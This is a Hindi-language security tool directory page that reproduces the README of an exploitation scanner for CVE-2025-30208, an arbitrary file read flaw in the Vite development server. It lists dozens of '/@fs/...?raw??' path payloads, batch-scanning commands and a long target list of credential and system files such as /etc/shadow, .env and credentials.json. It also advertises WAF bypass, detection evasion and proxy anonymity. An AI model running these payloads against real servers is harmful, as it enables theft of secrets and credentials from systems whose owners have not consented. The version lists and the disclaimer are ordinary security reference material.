Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 एक मध्यम-गंभीरता वाली मनमानी फ़ाइल पढ़ने की कमज़ोरी है जो Vite डेवलपमेंट सर्वर (एक लोकप्रिय फ्रंटएंड बिल्ड टूल) में पाई जाती है। | Kitploit
उपकरण/GitHubGitHub/themehackers/cve-2025-30208
भेद्यता स्कैनरपेलोड जनरेशनशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 एक मध्यम-गंभीरता वाली मनमानी फ़ाइल पढ़ने की कमज़ोरी है जो Vite डेवलपमेंट सर्वर (एक लोकप्रिय फ्रंटएंड बिल्ड टूल) में पाई जाती है।

रिपॉजिटरी देखें
101 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔥 CVE-2025-30208 Vite मनमानी फ़ाइल पठन भेद्यता स्कैनर

पायथन लाइसेंस सुरक्षा स्थिति मॉड्यूलर

CVE-2025-30208 के लिए उद्यम-ग्रेड सुविधाओं के साथ उन्नत भेद्यता स्कैनर

Vite मनमानी फ़ाइल पठन भेद्यता का पता लगाने के लिए पेशेवर प्रवेश परीक्षण उपकरण

🚀 त्वरित प्रारंभ • 📋 विशेषताएँ • 🔧 उपयोग • 📊 उदाहरण • 🛡️ सुरक्षा


📖 अवलोकन

यह एक व्यापक भेद्यता स्कैनर है जिसे Vite डेवलपमेंट सर्वरों में CVE-2025-30208 भेद्यता का पता लगाने और उसका शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता Vite के फ़ाइल सिस्टम एंडपॉइंट्स के माध्यम से मनमानी फ़ाइल पठन तक पहुँच की अनुमति देती है, जिससे संभावित रूप से संवेदनशील कॉन्फ़िगरेशन फ़ाइलें, स्रोत कोड और सिस्टम जानकारी उजागर हो सकती है।

🎯 यह उपकरण क्या करता है

  • पता लगाता है नेटवर्क में असुरक्षित Vite इंस्टेंस
  • सुरक्षित रूप से मनमानी फ़ाइल पठन भेद्यता का शोषण करता है
  • खोजता है संवेदनशील फ़ाइलें और कॉन्फ़िगरेशन डेटा
  • रिपोर्ट करता है परिणाम कई प्रारूपों में (HTML, JSON, कंसोल)
  • प्रबंधित करता है स्कैनिंग सत्र और कॉन्फ़िगरेशन
  • संभालता है त्रुटियों को स्वचालित पुनर्प्रयास तंत्र के साथ बखूबी

🏗️ मॉड्यूलर आर्किटेक्चर

उपकरण में अब बेहतर रखरखाव और विस्तार के लिए मॉड्यूलर आर्किटेक्चर है:

  • CVE-2025-30208.py - मुख्य स्कैनर एप्लिकेशन
  • payloads.py - उन्नत शोषण पेलोड (60+ विविधताएँ)
  • sensitive_files.py - व्यापक संवेदनशील फ़ाइल डेटाबेस (200+ फ़ाइलें)
  • html_template.py - उन्नत हैकर-शैली HTML रिपोर्टिंग टेम्पलेट

🚀 त्वरित प्रारंभ

पूर्वापेक्षाएँ

root@kitploit:~
pip3 install -r requirements.txt

मूल उपयोग

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 विशेषताएँ

🔍 मुख्य भेद्यता का पता लगाना

  • 60+ उन्नत पेलोड: अधिकतम पता लगाने के लिए व्यापक शोषण तकनीकें
  • स्मार्ट डिटेक्शन: गलत सकारात्मक परिणामों से बचने के लिए बुद्धिमान प्रतिक्रिया विश्लेषण
  • रीयल-टाइम सत्यापन: लक्ष्य प्रतिक्रियाओं का निरंतर सत्यापन
  • व्यापक परीक्षण: सभी ज्ञात असुरक्षित एंडपॉइंट का परीक्षण

🛡️ उन्नत सुरक्षा सुविधाएँ

  • प्रॉक्सी सपोर्ट: गुमनामी के लिए HTTP/HTTPS प्रॉक्सी कॉन्फ़िगरेशन
  • कस्टम हेडर: कस्टम HTTP हेडर के साथ WAF/IPS को बायपास करें
  • दर सीमित: पता लगाने से बचने के लिए कॉन्फ़िगर करने योग्य विलंब
  • सत्र प्रबंधन: स्कैनिंग सत्र को सहेजें और पुनर्स्थापित करें
  • इनपुट सत्यापन: व्यापक पैरामीटर सत्यापन

🔧 उन्नत क्षमताएँ

  • बैच स्कैनिंग: कई लक्ष्यों की मल्टी-थ्रेडेड स्कैनिंग
  • संवेदनशील फ़ाइल खोज: 200+ संवेदनशील फ़ाइलों की स्वचालित खोज
  • कनेक्टिविटी परीक्षण: TCP/UDP/HTTP/HTTPS प्रोटोकॉल परीक्षण
  • त्रुटि पुनर्प्राप्ति: एक्सपोनेंशियल बैकऑफ़ के साथ स्वचालित पुनर्प्रयास
  • व्यापक लॉगिंग: टाइमस्टैम्प के साथ विस्तृत लॉग

📊 रिपोर्टिंग और आउटपुट

  • 🎨 उन्नत HTML रिपोर्ट: एनिमेशन के साथ सुंदर हैकर-शैली भेद्यता रिपोर्ट
  • JSON निर्यात: आगे के विश्लेषण के लिए संरचित डेटा
  • कंसोल आउटपुट: रंग-कोडित रीयल-टाइम प्रतिक्रिया
  • लॉग फ़ाइलें: विस्तृत ऑडिट ट्रेल
  • इंटरैक्टिव वेब इंटरफ़ेस: रिपोर्ट देखने के लिए अंतर्निहित वेब सर्वर

🔧 उपयोग गाइड

1. मूल कॉन्फ़िगरेशन

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. भेद्यता परीक्षण

root@kitploit:~
CVE-2025-30208 > run

# विस्तृत आउटपुट के लिए वर्बोज़ मोड सक्षम करें
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. बैच स्कैनिंग

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[समाप्त करने के लिए Enter दो बार दबाएं]

4. संवेदनशील फ़ाइल खोज

root@kitploit:~
CVE-2025-30208 > scan

5. उन्नत कॉन्फ़िगरेशन

root@kitploit:~
# प्रॉक्सी कॉन्फ़िगर करें
CVE-2025-30208 > proxy
प्रॉक्सी दर्ज करें: http://127.0.0.1:8080

# कस्टम हेडर सेट करें
CVE-2025-30208 > headers
हेडर दर्ज करें: {"User-Agent": "Custom Scanner"}

# दर सीमित कॉन्फ़िगर करें
CVE-2025-30208 > rate
दर सीमा दर्ज करें: 1.0

6. उन्नत HTML रिपोर्टिंग

root@kitploit:~
# सुंदर HTML रिपोर्ट जनरेट करें
CVE-2025-30208 > pull

# रिपोर्ट देखने के लिए वेब सर्वर प्रारंभ करें
CVE-2025-30208 > web

# विशिष्ट पोर्ट पर वेब सर्वर प्रारंभ करें
CVE-2025-30208 > web 8081

# वेब सर्वर बंद करें
CVE-2025-30208 > web off

📊 कमांड संदर्भ


⚙️ कॉन्फ़िगरेशन विकल्प


🎨 उन्नत पेलोड सिस्टम

स्कैनर अब payloads.py में व्यवस्थित 60+ विभिन्न पेलोड विविधताओं का उपयोग करता है:

प्राथमिक @fs पेलोड

root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

विस्तारित पैरामीटर विविधताएँ

root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite-विशिष्ट विविधताएँ

root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

मॉड्यूल सिस्टम विविधताएँ

root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

वैकल्पिक एंडपॉइंट

root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 उन्नत संवेदनशील फ़ाइल खोज

उपकरण अब sensitive_files.py में व्यवस्थित 200+ संवेदनशील फ़ाइलों का परीक्षण करता है:

🖥️ सिस्टम फ़ाइलें (Linux/Unix)

  • /etc/passwd - उपयोगकर्ता खाता जानकारी
  • /etc/shadow - एन्क्रिप्टेड पासवर्ड डेटा
  • /etc/services - नेटवर्क सेवाएँ
  • /etc/hosts - होस्टनाम मैपिंग
  • /etc/fstab - फ़ाइल सिस्टम तालिका
  • /etc/ssh/sshd_config - SSH सर्वर कॉन्फ़िगरेशन
  • /etc/crontab - सिस्टम क्रॉन जॉब्स
  • /etc/sudoers - सूडो कॉन्फ़िगरेशन

📊 प्रक्रिया जानकारी

  • /proc/version - कर्नेल संस्करण
  • /proc/cpuinfo - CPU जानकारी
  • /proc/meminfo - मेमोरी जानकारी
  • /proc/self/environ - प्रक्रिया पर्यावरण
  • /proc/self/cmdline - प्रक्रिया कमांड लाइन
  • /proc/net/tcp - TCP कनेक्शन
  • /proc/net/udp - UDP कनेक्शन

⚙️ एप्लिकेशन कॉन्फ़िगरेशन

  • .env - पर्यावरण चर
  • .env.local - स्थानीय पर्यावरण
  • .env.production - उत्पादन पर्यावरण
  • config.json - एप्लिकेशन कॉन्फ़िगरेशन
  • settings.json - एप्लिकेशन सेटिंग्स
  • application.properties - Spring कॉन्फ़िगरेशन
  • application.yml - YAML कॉन्फ़िगरेशन
  • database.yml - डेटाबेस कॉन्फ़िगरेशन
  • secrets.json - गुप्त प्रबंधन

📦 Node.js / JavaScript फ़ाइलें

  • package.json - Node.js निर्भरताएँ
  • package-lock.json - लॉक की गई निर्भरताएँ
  • yarn.lock - Yarn लॉक फ़ाइल
  • vite.config.js - Vite कॉन्फ़िगरेशन
  • vite.config.ts - TypeScript Vite कॉन्फ़िग
  • tsconfig.json - TypeScript कॉन्फ़िगरेशन
  • webpack.config.js - Webpack कॉन्फ़िगरेशन
  • next.config.js - Next.js कॉन्फ़िगरेशन
  • nuxt.config.js - Nuxt.js कॉन्फ़िगरेशन
  • angular.json - Angular कॉन्फ़िगरेशन
  • vue.config.js - Vue.js कॉन्फ़िगरेशन
  • rollup.config.js - Rollup कॉन्फ़िगरेशन
  • eslint.config.js - ESLint कॉन्फ़िगरेशन

🔧 Git फ़ाइलें

  • .git/config - Git कॉन्फ़िगरेशन
  • .gitignore - Git इग्नोर नियम
  • .gitattributes - Git विशेषताएँ
  • .gitmodules - Git सबमॉड्यूल
  • .git/HEAD - वर्तमान ब्रांच
  • .git/logs/HEAD - Git लॉग
  • .git/refs/heads/master - मास्टर ब्रांच
  • .git/refs/heads/main - मुख्य ब्रांच

📚 दस्तावेज़ीकरण फ़ाइलें

  • README.md - परियोजना दस्तावेज़ीकरण
  • CHANGELOG.md - परिवर्तन लॉग
  • LICENSE - लाइसेंस जानकारी
  • CONTRIBUTING.md - योगदान दिशानिर्देश
  • AUTHORS - लेखक जानकारी
  • TODO.md - कार्य सूची
  • ROADMAP.md - विकास रोडमैप

🐳 Docker फ़ाइलें

  • Dockerfile - Docker कॉन्फ़िगरेशन
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - ओवरराइड कॉन्फ़िगरेशन
  • .dockerignore - Docker इग्नोर नियम
  • docker-compose.prod.yml - उत्पादन कॉन्फ़िगरेशन
  • docker-compose.dev.yml - डेवलपमेंट कॉन्फ़िगरेशन

🌐 वेब सर्वर कॉन्फ़िगरेशन

  • nginx.conf - Nginx कॉन्फ़िगरेशन
  • apache2.conf - Apache कॉन्फ़िगरेशन
  • httpd.conf - HTTP डेमॉन कॉन्फ़िग
  • .htaccess - Apache एक्सेस नियंत्रण
  • web.config - IIS कॉन्फ़िगरेशन
  • robots.txt - सर्च इंजन निर्देश
  • sitemap.xml - साइट संरचना
  • manifest.json - वेब ऐप मैनिफेस्ट
  • sw.js - सर्विस वर्कर
  • firebase.json - Firebase कॉन्फ़िगरेशन
  • firebase.rules - Firebase सुरक्षा नियम

🪟 Windows फ़ाइलें

  • boot.ini - बूट कॉन्फ़िगरेशन
  • autoexec.bat - स्वचालित निष्पादन स्क्रिप्ट
  • system.ini - सिस्टम कॉन्फ़िगरेशन
  • win.ini - Windows कॉन्फ़िगरेशन
  • Users - उपयोगकर्ता निर्देशिकाएँ
  • Windows - सिस्टम फ़ाइलें
  • Program Files - एप्लिकेशन निर्देशिकाएँ

🍎 macOS फ़ाइलें

  • System - सिस्टम फ़ाइलें
  • Library - लाइब्रेरी फ़ाइलें
  • Applications - एप्लिकेशन फ़ाइलें
  • private/etc/hosts - होस्ट्स फ़ाइल
  • private/etc/passwd - उपयोगकर्ता खाते

🗄️ डेटाबेस फ़ाइलें

  • database.db - SQLite डेटाबेस
  • database.sqlite - SQLite डेटाबेस
  • data.db - डेटा डेटाबेस
  • dump.sql - डेटाबेस डंप
  • schema.sql - डेटाबेस स्कीमा
  • migrations - डेटाबेस माइग्रेशन

📝 लॉग फ़ाइलें

  • logs - लॉग निर्देशिका
  • error.log - त्रुटि लॉग
  • access.log - एक्सेस लॉग
  • app.log - एप्लिकेशन लॉग
  • debug.log - डीबग लॉग
  • combined.log - संयुक्त लॉग

💾 बैकअप फ़ाइलें

  • backup - बैकअप निर्देशिका
  • backup.sql - डेटाबेस बैकअप
  • backup.zip - संपीड़ित बैकअप
  • dump - डेटा डंप
  • export - डेटा निर्यात

🔒 सुरक्षा और प्रमाणीकरण

  • auth.json - प्रमाणीकरण कॉन्फ़िगरेशन
  • credentials.json - क्रेडेंशियल स्टोरेज
  • keys.json - कुंजी प्रबंधन
  • tokens.json - टोकन स्टोरेज
  • jwt.json - JWT कॉन्फ़िगरेशन
  • oauth.json - OAuth कॉन्फ़िगरेशन

🔌 API और सेवा फ़ाइलें

  • api.json - API कॉन्फ़िगरेशन
  • swagger.json - API दस्तावेज़ीकरण
  • openapi.json - OpenAPI विनिर्देश
  • graphql.json - GraphQL कॉन्फ़िगरेशन
  • schema.json - API स्कीमा

☁️ क्लाउड और डिप्लॉयमेंट

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - सर्वरलेस कॉन्फ़िगरेशन
  • terraform.tf - Terraform कॉन्फ़िगरेशन
  • kubernetes.yml - Kubernetes कॉन्फ़िगरेशन
  • k8s.yml - Kubernetes कॉन्फ़िगरेशन

📊 मॉनिटरिंग और एनालिटिक्स

  • analytics.json - एनालिटिक्स कॉन्फ़िगरेशन
  • monitoring.json - मॉनिटरिंग सेटअप
  • metrics.json - मेट्रिक्स कॉन्फ़िगरेशन
  • telemetry.json - टेलीमेट्री डेटा

🎨 उन्नत HTML रिपोर्टिंग

उपकरण अब सुंदर हैकर-शैली HTML रिपोर्ट जनरेट करता है:

✨ दृश्य विशेषताएँ

  • मैट्रिक्स-शैली पृष्ठभूमि एनिमेटेड गिरते वर्णों के साथ
  • ग्रेडिएंट एनिमेशन और चमकदार प्रभाव
  • इंटरैक्टिव तत्व होवर प्रभावों के साथ
  • उत्तरदायी डिज़ाइन सभी उपकरणों के लिए
  • डार्क थीम सुरक्षा पेशेवरों के लिए अनुकूलित

📊 इंटरैक्टिव आँकड़े

  • रीयल-टाइम काउंटर कुल लीक और बाइट्स एक्सपोज़्ड के लिए
  • गंभीरता संकेतक रंग कोडिंग के साथ
  • प्रत्येक लीक के लिए कॉपी फ़ंक्शनलिटी
  • सामग्री पूर्वावलोकन आकार और पंक्ति गणना के साथ
  • विस्तार योग्य अनुभाग विस्तृत विश्लेषण के लिए

🔧 तकनीकी विशेषताएँ

  • Google Fonts एकीकरण (JetBrains Mono, Orbitron)
  • CSS एनिमेशन और ट्रांज़िशन
  • JavaScript इंटरैक्टिविटी बेहतर UX के लिए
  • मोबाइल-उत्तरदायी डिज़ाइन
  • क्रॉस-ब्राउज़र संगतता

🌐 वेब सर्वर एकीकरण

  • रिपोर्ट देखने के लिए अंतर्निहित HTTP सर्वर
  • स्वचालित ब्राउज़र खोलना
  • पोर्ट कॉन्फ़िगरेशन विकल्प
  • आसान प्रारंभ/बंद कमांड

🛡️ त्रुटि प्रबंधन और पुनर्प्राप्ति

स्वचालित पुनर्प्रयास तंत्र

  • 3 पुनर्प्रयास प्रयास: असफल अनुरोध स्वचालित रूप से पुनर्प्रयास किए जाते हैं
  • एक्सपोनेंशियल बैकऑफ़: पुनर्प्रयासों के बीच बढ़ती देरी
  • स्मार्ट त्रुटि वर्गीकरण: विभिन्न त्रुटि प्रकारों के लिए अलग-अलग प्रबंधन
  • ग्रेसफुल रिकवरी: त्रुटियों के बाद उपकरण संचालन जारी रखता है

त्रुटि श्रेणियाँ

  • NetworkError: कनेक्शन, टाइमआउट, प्रॉक्सी समस्याएँ
  • ConfigurationError: अमान्य सेटिंग्स और पैरामीटर
  • ValidationError: अमान्य इनपुट पैरामीटर
  • ScannerError: सामान्य स्कैनर त्रुटियाँ

सत्यापन विशेषताएँ

  • रीयल-टाइम इनपुट सत्यापन: उपयोग से पहले सभी पैरामीटर मान्य किए जाते हैं
  • कॉन्फ़िगरेशन सत्यापन: स्कैनिंग से पहले पूर्ण सत्यापन
  • कनेक्टिविटी परीक्षण: TCP/UDP/HTTP/HTTPS प्रोटोकॉल परीक्षण
  • प्रॉक्सी सत्यापन: प्रॉक्सी URL प्रारूप सत्यापन

📁 आउटपुट फ़ाइलें


📝 प्रभावित संस्करण

🚨 असुरक्षित संस्करण

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ अप्रभावित संस्करण

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ सुरक्षा और नैतिक उपयोग

⚠️ महत्वपूर्ण सुरक्षा नोट्स

  • केवल अधिकृत परीक्षण: केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है
  • जिम्मेदार प्रकटीकरण: सिस्टम मालिकों को भेद्यताओं की रिपोर्ट करें
  • दर सीमित: लक्ष्यों को अभिभूत करने से बचने के लिए उपयुक्त देरी का उपयोग करें
  • प्रॉक्सी उपयोग: जब उपयुक्त हो तो गुमनामी के लिए प्रॉक्सी का उपयोग करने पर विचार करें
  • कानूनी अनुपालन: स्थानीय कानूनों और विनियमों का अनुपालन सुनिश्चित करें

🔒 सर्वोत्तम अभ्यास

  • परीक्षण से पहले हमेशा लिखित अनुमति प्राप्त करें
  • केवल नियंत्रित वातावरण में उपयोग करें
  • सभी परीक्षण गतिविधियों का दस्तावेज़ीकरण करें
  • दर सीमाओं और सिस्टम संसाधनों का सम्मान करें
  • निष्कर्षों की जिम्मेदारी से रिपोर्ट करें

🚀 उन्नत उपयोग उदाहरण

उदाहरण 1: व्यापक नेटवर्क स्कैन

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

उदाहरण 2: प्रॉक्सी के साथ छिपकर स्कैनिंग

root@kitploit:~
CVE-2025-30208 > proxy
प्रॉक्सी दर्ज करें: http://127.0.0.1:8080
CVE-2025-30208 > headers
हेडर दर्ज करें: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

उदाहरण 3: उन्नत रिपोर्टिंग वर्कफ़्लो

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

उदाहरण 4: संवेदनशील फ़ाइल खोज

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ परियोजना संरचना

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # मुख्य स्कैनर एप्लिकेशन
├── payloads.py                # उन्नत शोषण पेलोड (60+)
├── sensitive_files.py         # संवेदनशील फ़ाइल डेटाबेस (200+)
├── html_template.py           # उन्नत HTML रिपोर्टिंग टेम्पलेट
├── README.md                  # यह दस्तावेज़ीकरण
├── requirements.txt           # Python निर्भरताएँ
├── logs/                      # लॉग फ़ाइलें निर्देशिका
├── data_leak.html            # जनरेट की गई HTML रिपोर्ट
├── data_leak.json            # जनरेट की गई JSON रिपोर्ट
└── session.json              # सहेजे गए सत्र कॉन्फ़िगरेशन

🤝 योगदान

हम इस उपकरण को बेहतर बनाने के लिए योगदान का स्वागत करते हैं:

  1. फोर्क करें रिपॉजिटरी
  2. बनाएं एक फीचर ब्रांच
  3. करें अपने बदलाव
  4. परीक्षण अच्छी तरह से
  5. सबमिट करें एक पुल रिक्वेस्ट

योगदान क्षेत्र

  • payloads.py में नई पेलोड विविधताएँ
  • sensitive_files.py में अतिरिक्त संवेदनशील फ़ाइल पैटर्न
  • html_template.py में उन्नत HTML टेम्पलेट
  • बेहतर त्रुटि प्रबंधन
  • प्रदर्शन अनुकूलन
  • दस्तावेज़ीकरण सुधार

📄 लाइसेंस

यह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए लाइसेंस प्राप्त है।

⚠️ कानूनी अस्वीकरण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए है। उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि किसी भी सिस्टम का परीक्षण करने से पहले उनके पास उचित प्राधिकरण है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।


👨‍💻 लेखक

ThemeHackers

GitHub

सुरक्षा शोधकर्ता और प्रवेश परीक्षक


⭐ यदि इस उपकरण ने आपकी मदद की, तो कृपया इसे एक स्टार दें! ⭐

सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया

टूल डाउनलोड करें
कमांडविवरणउदाहरण
set <option> <value>कॉन्फ़िगरेशन विकल्प सेट करेंset RHOST 192.168.1.100
show optionsवर्तमान सेटिंग्स प्रदर्शित करेंshow options
editइंटरैक्टिव विकल्प संपादकedit
run / exploitभेद्यता परीक्षण चलाएँrun
batchकई लक्ष्यों को बैच स्कैन करेंbatch
scanसंवेदनशील फ़ाइलें खोजेंscan
pullपरिणामों को HTML/JSON में निर्यात करेंpull
web [on|off|port]HTML रिपोर्ट के लिए वेब सर्वरweb 8080
saveसत्र कॉन्फ़िगरेशन सहेजेंsave
loadसत्र कॉन्फ़िगरेशन लोड करेंload
testलक्ष्य से कनेक्टिविटी का परीक्षण करेंtest
validateवर्तमान कॉन्फ़िगरेशन को मान्य करेंvalidate
verboseवर्बोज़ मोड टॉगल करेंverbose
proxyप्रॉक्सी सेटिंग्स कॉन्फ़िगर करेंproxy
headersकस्टम HTTP हेडर सेट करेंheaders
rateदर सीमित कॉन्फ़िगर करेंrate
logलॉगिंग जानकारी दिखाएँlog
help / ?सहायता दिखाएँhelp
exit / quitउपकरण से बाहर निकलेंexit
विकल्पविवरणडिफ़ॉल्टसत्यापन
RHOSTलक्ष्य होस्ट/IP पता-होस्टनाम/IP सत्यापन
RPORTलक्ष्य पोर्ट नंबर-पोर्ट रेंज (1-65535)
FILEPATHपरीक्षण करने के लिए फ़ाइल पथetc/passwdपथ सत्यापन
PROXYHTTP/HTTPS प्रॉक्सी URL-URL प्रारूप सत्यापन
VERBOSEवर्बोज़ आउटपुट सक्षम करेंfalseबूलियन सत्यापन
RATE_LIMITअनुरोधों के बीच विलंब (सेकंड)0.3संख्यात्मक सत्यापन
THREADSबैच स्कैनिंग के लिए थ्रेड की संख्या5पूर्णांक सत्यापन
TIMEOUTअनुरोध टाइमआउट (सेकंड)5पूर्णांक सत्यापन
CUSTOM_HEADERSकस्टम HTTP हेडर (JSON){}JSON प्रारूप सत्यापन
  • prettier.config.js - Prettier कॉन्फ़िगरेशन
  • jest.config.js - Jest कॉन्फ़िगरेशन
  • babel.config.js - Babel कॉन्फ़िगरेशन
  • tailwind.config.js - Tailwind CSS कॉन्फ़िगरेशन
  • फ़ाइलविवरणप्रारूप
    data_leak.htmlउन्नत हैकर-शैली HTML भेद्यता रिपोर्टHTML
    data_leak.jsonसंरचित JSON निर्यातJSON
    sensitive_files_discovery.jsonखोजी गई संवेदनशील फ़ाइलेंJSON
    session.jsonसहेजा गया सत्र कॉन्फ़िगरेशनJSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.logविस्तृत ऑडिट लॉगटेक्स्ट